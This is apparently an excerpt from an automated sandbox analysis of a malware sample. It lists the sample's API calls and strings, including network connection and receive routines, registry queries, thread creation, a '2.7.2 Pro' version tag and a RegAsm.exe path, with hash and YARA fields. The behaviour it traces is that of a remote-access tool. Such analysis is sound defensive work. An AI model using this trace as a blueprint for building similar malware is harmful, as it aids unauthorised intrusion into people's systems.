                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                  • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                  • atoi.MSVCRT ref: 0040C9DE
                                  • htons.WS2_32(00000000), ref: 0040C9E6
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                  • sprintf.MSVCRT ref: 0040CB14
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                  • _itoa.MSVCRT ref: 0040CB37
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00409E7D: GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                    • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?), ref: 0040CBCC
                                  • GetTickCount.KERNEL32 ref: 0040CC20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                  • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                  • atoi.MSVCRT ref: 0040D285
                                  • Sleep.KERNEL32(00000000), ref: 0040D293
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                  • String ID: %I64u$2.7.2 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                  • API String ID: 43808216-3109502590
                                  • Opcode ID: df404ec401015cbb6a39c76b24060234d0af4cf8c9c06267c06abbf960c9cd09
                                  • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                  • Opcode Fuzzy Hash: df404ec401015cbb6a39c76b24060234d0af4cf8c9c06267c06abbf960c9cd09
                                  • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004135DE, Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                  • _wgetenv.MSVCRT ref: 0041366D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                  • _wgetenv.MSVCRT ref: 004136CE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                  • _wgetenv.MSVCRT ref: 00413720
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                  • GetLongPathNameW.KERNEL32 ref: 00413748
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
